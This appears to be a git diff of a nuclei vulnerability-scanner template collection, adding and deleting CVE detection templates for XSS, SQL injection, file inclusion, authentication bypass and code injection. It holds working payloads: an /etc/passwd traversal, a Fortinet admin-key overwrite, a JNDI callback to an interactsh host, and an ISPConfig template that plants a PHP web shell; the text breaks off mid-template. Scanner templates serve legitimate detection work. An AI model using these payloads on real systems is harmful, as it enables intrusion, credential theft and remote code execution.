author: 3th1c_yuk1 + severity: medium + description: | + Parallels H-Sphere 3.6.1713 contains a cross-site scripting vulnerability via the index_en.php 'from' parameter. + reference: + - https://medium.com/@bhattronit96/cve-2022-30777-45725763ab59 + - https://en.wikipedia.org/wiki/H-Sphere + - https://nvd.nist.gov/vuln/detail/CVE-2022-30777 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2022-30777 + cwe-id: CWE-79 + metadata: + shodan-query: title:"h-sphere" + verified: "true" + tags: cve,cve2022,parallels,hsphere,xss + +requests: + - method: GET + path: + - '{{BaseURL}}/index_en.php?from=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' + - '{{BaseURL}}/index.php?from=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' + + stop-at-first-match: true + matchers-condition: and + matchers: + + - type: word + words: + - '<TITLE>"><script>alert(document.domain)</script>' + + - type: word + part: header + words: + - "text/html" + + - type: status + status: + - 200 + +# Enhanced by mp on 2022/09/14 diff --git a/nuclei-templates/CVE-2022/cve-2022-31373.yaml b/nuclei-templates/CVE-2022/cve-2022-31373.yaml deleted file mode 100644 index 8c1c21231b..0000000000 --- a/nuclei-templates/CVE-2022/cve-2022-31373.yaml +++ /dev/null @@ -1,45 +0,0 @@ -id: CVE-2022-31373 - -info: - name: SolarView Compact 6.00 - Cross-Site Scripting - author: ritikchaddha - severity: medium - description: | - SolarView Compact 6.00 contains a cross-site scripting vulnerability via Solar_AiConf.php. An attacker can execute arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. - reference: - - https://github.com/badboycxcc/SolarView_Compact_6.0_xss - - https://nvd.nist.gov/vuln/detail/CVE-2022-31373 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2022-31373 - cwe-id: CWE-79 - metadata: - shodan-query: http.html:"SolarView Compact" - verified: "true" - tags: cve,cve2022,xss,solarview - -requests: - - method: GET - path: - - '{{BaseURL}}/Solar_AiConf.php/%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' - - matchers-condition: and - matchers: - - type: word - part: body - words: - - '/Solar_AiConf.php/"><script>alert(document.domain)</script>' - - 'HREF="Solar_Service.php"' - condition: and - - - type: word - part: header - words: - - "text/html" - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/09/28 diff --git a/nuclei-templates/CVE-2022/cve-2022-32007.yaml b/nuclei-templates/CVE-2022/cve-2022-32007.yaml deleted file mode 100644 index fee1101dd8..0000000000 --- a/nuclei-templates/CVE-2022/cve-2022-32007.yaml +++ /dev/null @@ -1,44 +0,0 @@ -id: CVE-2022-32007 - -info: - name: Complete Online Job Search System 1.0 - SQL Injection - author: arafatansari - severity: high - description: | - Complete Online Job Search System 1.0 contains a SQL injection vulnerability via /eris/admin/company/index.php?view=edit&id=. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site. - reference: - - https://github.com/k0xx11/bug_report/blob/main/vendors/campcodes.com/online-job-search-system/SQLi-2.md - - https://nvd.nist.gov/vuln/detail/CVE-2022-32007 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H - cvss-score: 7.2 - cve-id: CVE-2022-32007 - cwe-id: CWE-89 - metadata: - verified: "true" - tags: cve,cve2022,sqli,eris,authenticated - -variables: - num: "999999999" - -requests: - - raw: - - | - POST /admin/login.php HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - user_email={{username}}&user_pass={{password}}&btnLogin= - - - | - GET /admin/company/index.php?view=edit&id=-3%27%20union%20select%201,md5({{num}}),3,4,5,6--+ HTTP/1.1 - Host: {{Hostname}} - - cookie-reuse: true - matchers: - - type: word - part: body - words: - - '{{md5({{num}})}}' - -# Enhanced by mp on 2022/09/28 diff --git a/nuclei-templates/CVE-2022/cve-2022-32018.yaml b/nuclei-templates/CVE-2022/cve-2022-32018.yaml deleted file mode 100644 index b9819f6aa3..0000000000 --- a/nuclei-templates/CVE-2022/cve-2022-32018.yaml +++ /dev/null @@ -1,35 +0,0 @@ -id: CVE-2022-32018 - -info: - name: Complete Online Job Search System 1.0 - SQL Injection - author: arafatansari - severity: high - description: | - Complete Online Job Search System 1.0 contains a SQL injection vulnerability via /eris/index.php?q=hiring&search=. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site. - reference: - - https://github.com/k0xx11/bug_report/blob/main/vendors/campcodes.com/online-job-search-system/SQLi-12.md - - https://nvd.nist.gov/vuln/detail/CVE-2022-32018 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H - cvss-score: 7.2 - cve-id: CVE-2022-32018 - cwe-id: CWE-89 - metadata: - verified: "true" - tags: cve,cve2022,sqli - -variables: - num: "999999999" - -requests: - - method: GET - path: - - "{{BaseURL}}/index.php?q=hiring&search=URC%27%20union%20select%201,2,3,4,5,6,7,8,9,md5({{num}}),11,12,13,14,15,16,17,18,19--+" - - matchers: - - type: word - part: body - words: - - '{{md5({{num}})}}' - -# Enhanced by mp on 2022/09/28 diff --git a/nuclei-templates/CVE-2022/cve-2022-32024.yaml b/nuclei-templates/CVE-2022/cve-2022-32024.yaml deleted file mode 100644 index 702a2df8ed..0000000000 --- a/nuclei-templates/CVE-2022/cve-2022-32024.yaml +++ /dev/null @@ -1,52 +0,0 @@ -id: CVE-2022-32024 - -info: - name: Car Rental Management System 1.0 - SQL Injection - author: arafatansari - severity: high - description: | - Car Rental Management System 1.0 contains an SQL injection vulnerability via /booking.php?car_id=. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site. - reference: - - https://github.com/k0xx11/bug_report/blob/main/vendors/campcodes.com/car-rental-management-system/SQLi-4.md - - https://nvd.nist.gov/vuln/detail/CVE-2022-32024 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H - cvss-score: 7.2 - cve-id: CVE-2022-32024 - cwe-id: CWE-89 - metadata: - comment: Login bypass is also possible using the payload- admin'+or+'1'%3D'1' in username. - shodan-query: http.html:"Car Rental Management System" - verified: "true" - tags: cve,cve2022,carrental,cms,sqli,authenticated - -variables: - num: "999999999" - -requests: - - raw: - - | - POST /admin/ajax.php?action=login HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - username={{username}}&password={{password}} - - - | - GET /booking.php?car_id=-1%20union%20select%201,md5({{num}}),3,4,5,6,7,8,9,10--+ HTTP/1.1 - Host: {{Hostname}} - - skip-variables-check: true - cookie-reuse: true - matchers-condition: and - matchers: - - type: word - part: body - words: - - '{{md5({{num}})}}' - - - type: status - status: - - 200 - -# Enhanced by md on 2022/09/26 diff --git a/nuclei-templates/CVE-2022/cve-2022-32025.yaml b/nuclei-templates/CVE-2022/cve-2022-32025.yaml new file mode 100644 index 0000000000..aaeeb7a420 --- /dev/null +++ b/nuclei-templates/CVE-2022/cve-2022-32025.yaml @@ -0,0 +1,54 @@ +id: CVE-2022-32025 + +info: + name: Car Rental Management System 1.0 - SQL Injection + author: arafatansari + severity: high + description: | + Car Rental Management System 1.0 contains an SQL injection vulnerability via /admin/view_car.php?id=. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site. + reference: + - https://github.com/k0xx11/bug_report/blob/main/vendors/campcodes.com/car-rental-management-system/SQLi-6.md + - https://nvd.nist.gov/vuln/detail/CVE-2022-32025 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H + cvss-score: 7.2 + cve-id: CVE-2022-32025 + cwe-id: CWE-89 + metadata: + comment: Login bypass is also possible using the payload - admin'+or+'1'%3D'1' in username. + shodan-query: http.html:"Car Rental Management System" + verified: "true" + tags: cve,cve2022,carrental,cms,sqli,authenticated + +variables: + num: "999999999" + +requests: + - raw: + - | + POST /admin/ajax.php?action=login HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + username={{username}}%23&password={{password}} + + - | + GET /admin/view_car.php?id=-1%20union%20select%201,md5({{num}}),3,4,5,6,7,8,9,10--+ HTTP/1.1 + Host: {{Hostname}} + + skip-variables-check: true + host-redirects: true + max-redirects: 2 + cookie-reuse: true + matchers-condition: and + matchers: + - type: word + part: body + words: + - '{{md5({{num}})}}' + + - type: status + status: + - 200 + +# Enhanced by md on 2022/09/26 diff --git a/nuclei-templates/CVE-2022/cve-2022-32028.yaml b/nuclei-templates/CVE-2022/cve-2022-32028.yaml deleted file mode 100644 index b598d48ce0..0000000000 --- a/nuclei-templates/CVE-2022/cve-2022-32028.yaml +++ /dev/null @@ -1,54 +0,0 @@ -id: CVE-2022-32028 - -info: - name: Car Rental Management System 1.0 - SQL Injection - author: arafatansari - severity: high - description: | - Car Rental Management System 1.0 contains an SQL injection vulnerability via /admin/manage_user.php?id=. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site. - reference: - - https://github.com/k0xx11/bug_report/blob/main/vendors/campcodes.com/car-rental-management-system/SQLi-8.md - - https://nvd.nist.gov/vuln/detail/CVE-2022-32028 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H - cvss-score: 7.2 - cve-id: CVE-2022-32028 - cwe-id: CWE-89 - metadata: - comment: Login bypass is also possible using the payload - admin'+or+'1'%3D'1' in username. - shodan-query: http.html:"Car Rental Management System" - verified: "true" - tags: cve,cve2022,carrental,cms,sqli,authenticated - -variables: - num: "999999999" - -requests: - - raw: - - | - POST /admin/ajax.php?action=login HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - username={{username}}&password={{password}} - - - | - GET /admin/manage_user.php?id=-1%20union%20select%201,md5({{num}}),3,4,5--+ HTTP/1.1 - Host: {{Hostname}} - - skip-variables-check: true - host-redirects: true - max-redirects: 2 - cookie-reuse: true - matchers-condition: and - matchers: - - type: word - part: body - words: - - '{{md5({{num}})}}' - - - type: status - status: - - 200 - -# Enhanced by md on 2022/09/26 diff --git a/nuclei-templates/CVE-2022/cve-2022-32409.yaml b/nuclei-templates/CVE-2022/cve-2022-32409.yaml deleted file mode 100644 index 45a9d0ff2e..0000000000 --- a/nuclei-templates/CVE-2022/cve-2022-32409.yaml +++ /dev/null @@ -1,38 +0,0 @@ -id: CVE-2022-32409 - -info: - name: Portal do Software Publico Brasileiro i3geo 7.0.5 - Local File Inclusion - author: pikpikcu - severity: critical - description: Portal do Software Publico Brasileiro i3geo 7.0.5 is vulnerable to local file inclusion in the component codemirror.php, which allows attackers to execute arbitrary PHP code via a crafted HTTP request. - reference: - - https://github.com/wagnerdracha/ProofOfConcept/blob/main/i3geo_proof_of_concept.txt - - https://owasp.org/www-project-web-security-testing-guide/v42/4-Web_Application_Security_Testing/07-Input_Validation_Testing/11.1-Testing_for_Local_File_Inclusion - - https://nvd.nist.gov/vuln/detail/CVE-2022-32409 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 - cve-id: CVE-2022-32409 - cwe-id: CWE-94 - metadata: - shodan-query: http.html:"i3geo" - verified: "true" - tags: cve,cve2022,i3geo,lfi - -requests: - - method: GET - path: - - "{{BaseURL}}/i3geo/exemplos/codemirror.php?&pagina=../../../../../../../../../../../../../../../../../etc/passwd" - - matchers-condition: and - matchers: - - - type: regex - regex: - - "root:[x*]:0:0" - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/07/22 diff --git a/nuclei-templates/CVE-2022/cve-2022-32444.yaml b/nuclei-templates/CVE-2022/cve-2022-32444.yaml new file mode 100644 index 0000000000..fe206ab90c --- /dev/null +++ b/nuclei-templates/CVE-2022/cve-2022-32444.yaml @@ -0,0 +1,27 @@ +id: CVE-2022-32444 + +info: + name: u5cms v8.3.5- Open Redirect + author: 0x_Akoko + severity: medium + description: An issue was discovered in u5cms verion 8.3.5 There is a URL redirection vulnerability that can cause a user's browser to be redirected to another site via /loginsave.php. + reference: + - https://github.com/u5cms/u5cms/issues/50 + - https://www.cvedetails.com/cve/CVE-2022-32444 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2022-32444 + cwe-id: CWE-601 + tags: cve,cve2022,redirect,u5cms,cms + +requests: + - method: GET + path: + - '{{BaseURL}}/loginsave.php?u=http://example.com' + + matchers: + - type: regex + part: header + regex: + - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1 diff --git a/nuclei-templates/CVE-2022/cve-2022-33174.yaml b/nuclei-templates/CVE-2022/cve-2022-33174.yaml deleted file mode 100644 index 59e665b041..0000000000 --- a/nuclei-templates/CVE-2022/cve-2022-33174.yaml +++ /dev/null @@ -1,49 +0,0 @@ -id: CVE-2022-33174 - -info: - name: Powertek Firmware <3.30.30 - Authorization Bypass - author: pikpikcu - severity: high - description: | - Powertek firmware (multiple brands) before 3.30.30 running Power Distribution Units are vulnerable to authorization bypass in the web interface. To exploit the vulnerability, an attacker must send an HTTP packet to the data retrieval interface (/cgi/get_param.cgi) with the tmpToken cookie set to an empty string followed by a semicolon. This bypasses an active session authorization check. This can be then used to fetch the values of protected sys.passwd and sys.su.name fields that contain the username and password in cleartext. - reference: - - https://gynvael.coldwind.pl/?lang=en&id=748 - - https://nvd.nist.gov/vuln/detail/CVE-2022-33174 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 - cve-id: CVE-2022-33174 - cwe-id: CWE-863 - metadata: - shodan-query: http.html:"Powertek" - verified: "true" - tags: cve,cve2022,powertek,auth-bypass - -requests: - - raw: - - | - GET /cgi/get_param.cgi?xml&sys.passwd&sys.su.name HTTP/1.1 - Host: {{Hostname}} - Cookie: tmpToken=; - - matchers-condition: and - matchers: - - - type: word - words: - - '<sys.passwd>' - - '<sys.su.name>' - - - type: status - status: - - 200 - - extractors: - - type: regex - part: body - group: 1 - regex: - - '<sys\.passwd>([A-Z0-9a-z]+)<\/sys\.passwd>' - - '<sys\.su\.name>([a-z]+)<\/sys\.su\.name>' - -# Enhanced by mp on 2022/07/15 diff --git a/nuclei-templates/CVE-2022/cve-2022-34049.yaml b/nuclei-templates/CVE-2022/cve-2022-34049.yaml new file mode 100644 index 0000000000..8348fca99e --- /dev/null +++ b/nuclei-templates/CVE-2022/cve-2022-34049.yaml @@ -0,0 +1,46 @@ +id: CVE-2022-34049 + +info: + name: Wavlink Exportlogs.sh - Configuration Exposure + author: For3stCo1d + severity: medium + description: | + An access control issue in Wavlink WN530HG4 M30HG4.V5030.191116 allows unauthenticated attackers to download log files and configuration data. + reference: + - https://drive.google.com/file/d/1-eNgq6IS609bq2vB93c_N8jnZrJ2dgNF/view + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-34049 + - https://drive.google.com/file/d/1ZeSwqu04OghLQXeG7emU-w-Amgadafqx/view?usp=sharing + - https://drive.google.com/file/d/1-eNgq6IS609bq2vB93c_N8jnZrJ2dgNF/view?usp=sharing + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.3 + cve-id: CVE-2022-34049 + cwe-id: CWE-552 + metadata: + shodan-query: http.title:"Wi-Fi APP Login" + verified: "true" + tags: cve,cve2022,wavlink,router,exposure + +requests: + - raw: + - | + GET /cgi-bin/ExportLogs.sh HTTP/1.1 + Host: {{Hostname}} + + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'Login' + - 'Password' + condition: and + + - type: word + part: header + words: + - filename="sysLogs.txt" + + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2022/cve-2022-35416.yaml b/nuclei-templates/CVE-2022/cve-2022-35416.yaml deleted file mode 100644 index 90b8578414..0000000000 --- a/nuclei-templates/CVE-2022/cve-2022-35416.yaml +++ /dev/null @@ -1,46 +0,0 @@ -id: CVE-2022-35416 - -info: - name: H3C SSL VPN <=2022-07-10 - Cross-Site Scripting - author: 0x240x23elu - severity: medium - description: | - H3C SSL VPN 2022-07-10 and prior contains a cookie-based cross-site scripting vulnerability in wnm/login/login.json svpnlang. - reference: - - https://github.com/advisories/GHSA-9x76-78gc-r3m9 - - https://github.com/Docker-droid/H3C_SSL_VPN_XSS - - https://nvd.nist.gov/vuln/detail/CVE-2022-35416 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2022-35416 - cwe-id: CWE-79 - metadata: - shodan-query: http.html_hash:510586239 - verified: "true" - tags: cve,cve2022,xss,vpn,h3c - -requests: - - raw: - - | - GET /wnm/login/login.json HTTP/1.1 - Host: {{Hostname}} - Cookie: svpnlang=<script>alert('document.domain')</script> - - matchers-condition: and - matchers: - - type: word - part: body - words: - - "<script>alert('document.domain')</script>" - - - type: word - part: header - words: - - text/html - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/09/14 diff --git a/nuclei-templates/CVE-2022/cve-2022-40684.yaml b/nuclei-templates/CVE-2022/cve-2022-40684.yaml new file mode 100644 index 0000000000..c2bb50aeb8 --- /dev/null +++ b/nuclei-templates/CVE-2022/cve-2022-40684.yaml @@ -0,0 +1,61 @@ +id: CVE-2022-40684 + +info: + name: Fortinet - Authentication Bypass + author: Shockwave,nagli,carlosvieira + severity: critical + description: | + Fortinet contains an authentication bypass vulnerability via using an alternate path or channel in FortiOS 7.2.0 through 7.2.1 and 7.0.0 through 7.0.6, FortiProxy 7.2.0 and 7.0.0 through 7.0.6, and FortiSwitchManager 7.2.0 and 7.0.0. An attacker can perform operations on the administrative interface via specially crafted HTTP or HTTPS requests, thus making it possible to obtain sensitive information, modify data, and/or execute unauthorized operations. + reference: + - https://github.com/horizon3ai/CVE-2022-40684/blob/master/CVE-2022-40684.py + - https://securityonline.info/researchers-have-developed-cve-2022-40684-poc-exploit-code/ + - https://socradar.io/what-do-you-need-to-know-about-fortinet-critical-authentication-bypass-vulnerability-cve-2022-40684/ + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-40684 + - https://nvd.nist.gov/vuln/detail/CVE-2022-40684 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2022-40684 + cwe-id: CWE-306 + tags: cve,cve2022,fortinet,fortigate,fortios,fortiproxy,auth-bypass,kev + +requests: + - raw: + - | + GET /api/v2/cmdb/system/admin HTTP/1.1 + Host: {{Hostname}} + User-Agent: Node.js + Forwarded: by="[127.0.0.1]:1337";for="[127.0.0.1]:1337";proto=http;host= + X-Forwarded-Vdom: root + + - | + PUT /api/v2/cmdb/system/admin/admin HTTP/1.1 + Host: {{Hostname}} + User-Agent: Report Runner + Content-Type: application/json + Forwarded: for=[127.0.0.1]:8000;by=[127.0.0.1]:9000; + Content-Length: 610 + + { + "ssh-public-key1":"{{randstr}}" + } + + stop-at-first-match: true + req-condition: true + matchers-condition: or + matchers: + - type: word + part: body_1 + words: + - "ENC XXXX" + - "http_method" + condition: and + + - type: word + part: body_2 + words: + - 'Invalid SSH public key.' + - 'cli_error' + condition: and + +# Enhanced by md on 2022/10/19 diff --git a/nuclei-templates/CVE-2022/CVE-2022-42889.yaml b/nuclei-templates/CVE-2022/cve-2022-42889.yaml similarity index 100% rename from nuclei-templates/CVE-2022/CVE-2022-42889.yaml rename to nuclei-templates/CVE-2022/cve-2022-42889.yaml diff --git a/nuclei-templates/CVE-2023/CVE-2023-25194.yaml b/nuclei-templates/CVE-2023/CVE-2023-25194.yaml deleted file mode 100644 index 344fe9f3b0..0000000000 --- a/nuclei-templates/CVE-2023/CVE-2023-25194.yaml +++ /dev/null @@ -1,99 +0,0 @@ -id: CVE-2023-25194 - -info: - name: Apache Druid Kafka Connect - Remote Code Execution - author: j4vaovo - severity: high - description: | - The vulnerability has the potential to enable a remote attacker with authentication to run any code on the system. This is due to unsafe deserialization that occurs during the configuration of the connector through the Kafka Connect REST API - reference: - - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-25194 - - https://nvd.nist.gov/vuln/detail/CVE-2023-25194 - - https://github.com/nbxiglk0/Note/blob/0ddc14ecd296df472726863aa5d1f0f29c8adcc4/%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/Java/ApacheDruid/ApacheDruid%20Kafka-rce/ApacheDruid%20Kafka-rce.md#apachedruid-kafka-connect-rce - - http://packetstormsecurity.com/files/173151/Apache-Druid-JNDI-Injection-Remote-Code-Execution.html - - https://kafka.apache.org/cve-list - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H - cvss-score: 8.8 - cve-id: CVE-2023-25194 - cwe-id: CWE-502 - epss-score: 0.91608 - epss-percentile: 0.98695 - cpe: cpe:2.3:a:apache:kafka_connect:*:*:*:*:*:*:*:* - metadata: - verified: true - max-request: 1 - vendor: apache - product: kafka_connect - shodan-query: html:"Apache Druid" - tags: packetstorm,cve,cve2023,apache,druid,kafka,rce,jndi,oast - -http: - - raw: - - | - POST /druid/indexer/v1/sampler?for=connect HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/json - - { - "type":"kafka", - "spec":{ - "type":"kafka", - "ioConfig":{ - "type":"kafka", - "consumerProperties":{ - "bootstrap.servers":"127.0.0.1:6666", - "sasl.mechanism":"SCRAM-SHA-256", - "security.protocol":"SASL_SSL", - "sasl.jaas.config":"com.sun.security.auth.module.JndiLoginModule required user.provider.url=\"rmi://{{interactsh-url}}:6666/test\" useFirstPass=\"true\" serviceName=\"x\" debug=\"true\" group.provider.url=\"xxx\";" - }, - "topic":"test", - "useEarliestOffset":true, - "inputFormat":{ - "type":"regex", - "pattern":"([\\s\\S]*)", - "listDelimiter":"56616469-6de2-9da4-efb8-8f416e6e6965", - "columns":[ - "raw" - ] - } - }, - "dataSchema":{ - "dataSource":"sample", - "timestampSpec":{ - "column":"!!!_no_such_column_!!!", - "missingValue":"1970-01-01T00:00:00Z" - }, - "dimensionsSpec":{ - - }, - "granularitySpec":{ - "rollup":false - } - }, - "tuningConfig":{ - "type":"kafka" - } - }, - "samplerConfig":{ - "numRows":500, - "timeoutMs":15000 - } - } - - matchers-condition: and - matchers: - - type: word - part: interactsh_protocol - words: - - "dns" - - - type: word - part: body - words: - - 'RecordSupplier' - - - type: status - status: - - 400 -# digest: 4a0a004730450220253e393d9460c536f32f54253122a4cbfbbb890af4cd35b91b95d10e1b94d6b8022100e0a025041c041e62a80292747511e4d1af8e4adbe51386321a14466077c090aa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2023/CVE-2023-28432.yaml b/nuclei-templates/CVE-2023/CVE-2023-28432.yaml new file mode 100644 index 0000000000..aba88864c4 --- /dev/null +++ b/nuclei-templates/CVE-2023/CVE-2023-28432.yaml @@ -0,0 +1,37 @@ +id: CVE-2023-28432 +info: + name: Minio post policy request security bypass + author: Mr-xn + severity: high + description: Minio is a Multi-Cloud Object Storage framework. In a cluster deployment starting with RELEASE.2019-12-17T23-16-33Z and prior to RELEASE.2023-03-20T20-16-18Z, MinIO returns all environment variables, including MINIO_SECRET_KEY and MINIO_ROOT_PASSWORD, resulting in information disclosure. All users of distributed deployment are impacted. All users are advised to upgrade to RELEASE.2023-03-20T20-16-18Z. + reference: + - https://github.com/minio/minio/security/advisories/GHSA-6xvq-wj2x-3h3q + - https://github.com/minio/minio/pull/16853/files + - https://github.com/golang/vulndb/issues/1667 + - https://github.com/CVEProject/cvelist/blob/master/2023/28xxx/CVE-2023-28432.json + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2023-28432 + cwe-id: CWE-200 + tags: cve,cve2023, +requests: + - raw: + - |+ + POST /minio/bootstrap/v1/verify HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + matchers-condition: and + matchers: + - type: word + part: body + words: + - '"MinioEndpoints"' + - type: word + part: header + words: + - 'Content-Type: text/plain' + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2023/CVE-2023-35047.yaml b/nuclei-templates/CVE-2023/CVE-2023-35047.yaml new file mode 100644 index 0000000000..a8e1f1a930 --- /dev/null +++ b/nuclei-templates/CVE-2023/CVE-2023-35047.yaml @@ -0,0 +1,56 @@ +id: CVE-2023-35047 + +info: + name: "All Bootstrap Blocks <= 1.3.6 - Cross-Site Request Forgery to Plugin Settings Reset" + author: topscoder + severity: medium + description: "The All Bootstrap Blocks plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 1.3.6. This is due to missing nonce validation on the reset() function. This makes it possible for unauthenticated attackers to reset the plugin's settings via a forged request granted they can trick a site administrator into performing an action such as clicking on a link." + reference: + - https://www.wordfence.com/threat-intel/vulnerabilities/id/4a7a15ab-4f13-4eb1-aeb5-143230308871?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L + cvss-score: 6.5 + cve-id: CVE-2023-35047 + metadata: + fofa-query: "wp-content/plugins/all-bootstrap-blocks/" + google-query: inurl:"/wp-content/plugins/all-bootstrap-blocks/" + shodan-query: 'vuln:CVE-2023-35047' + tags: cve,wordpress,wp-plugin,all-bootstrap-blocks,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/all-bootstrap-blocks/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "all-bootstrap-blocks" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.3.6') diff --git a/nuclei-templates/Other/dahua-wpms-addimgico-fileupload.yaml b/nuclei-templates/CVE-2023/CVE-2023-3836.yaml similarity index 100% rename from nuclei-templates/Other/dahua-wpms-addimgico-fileupload.yaml rename to nuclei-templates/CVE-2023/CVE-2023-3836.yaml diff --git a/nuclei-templates/CVE-2023/CVE-2023-46818.yaml b/nuclei-templates/CVE-2023/CVE-2023-46818.yaml new file mode 100644 index 0000000000..742fd14a37 --- /dev/null +++ b/nuclei-templates/CVE-2023/CVE-2023-46818.yaml @@ -0,0 +1,144 @@ +id: CVE-2023-46818 + +info: + name: ISPConfig - PHP Code Injection + author: non-things + severity: high + description: | + An issue was discovered in ISPConfig before 3.2.11p1. PHP code injection can be achieved in the language file editor by an admin if admin_allow_langedit is enabled. + reference: + - https://www.ispconfig.org/blog/ispconfig-3-2-11p1-released/ + - http://packetstormsecurity.com/files/176126/ISPConfig-3.2.11-PHP-Code-Injection.html + - http://seclists.org/fulldisclosure/2023/Dec/2 + - https://nvd.nist.gov/vuln/detail/CVE-2023-46818 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H + cvss-score: 7.2 + cve-id: CVE-2023-46818 + cwe-id: CWE-94 + metadata: + verified: true + max-requests: 1 + product: ispconfig + tags: cve,cve2023,ispconfig,php,rce + +flow: http(1) && http(2) && http(3) && http(4) && http(5) && http(6) + +variables: + lang-file: "{{rand_text_alpha(26)}}.lng" + websh-file: "{{rand_text_alphanumeric(32)}}.php" + websh: "<?php print('____'); passthru(base64_decode($_SERVER['HTTP_C'])); print('____'); ?>" + websh-base64: "{{base64(websh)}}" + payload: "'];file_put_contents('{{websh-file}}',base64_decode('{{websh-base64}}'));die;#" + payload-url-enc: "{{url_encode(payload)}}" + echo-cmd-hash: "{{rand_text_alphanumeric(32)}}" + echo-cmd: "echo {{echo-cmd-hash}}" + +http: + - raw: + - | + POST /login/index.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + username={{username}}&password={{password}}&s_mod=login + + matchers: + - type: dsl + dsl: + - 'contains(header, "Set-Cookie")' + - 'status_code == 302' + condition: and + + - raw: + - | + POST /admin/language_edit.php HTTP/1.1 + Host: {{Hostname}} + Accept: */* + Content-Type: application/x-www-form-urlencoded + + lang=en&module=help&lang_file={{lang-file}} + + matchers: + - type: dsl + dsl: + - 'contains_all(response, "_csrf_id", "_csrf_key")' + - 'status_code == 200' + condition: and + + extractors: + - type: regex + name: lang_file_location + group: 1 + regex: + - "<legend>Language file: (.*)</legend>" + internal: true + + - type: regex + name: csrf_id + group: 1 + regex: + - "_csrf_id\" value=\"(.*)\" />" + internal: true + + - type: regex + name: csrf_key + group: 1 + regex: + - "_csrf_key\" value=\"(.*)\" />" + internal: true + + - raw: + - | + POST /admin/language_edit.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + lang=en&module=help&lang_file={{lang-file}}&_csrf_id={{csrf_id}}&_csrf_key={{csrf_key}}&records[%5C]={{payload-url-enc}} + + matchers: + - type: dsl + dsl: + - 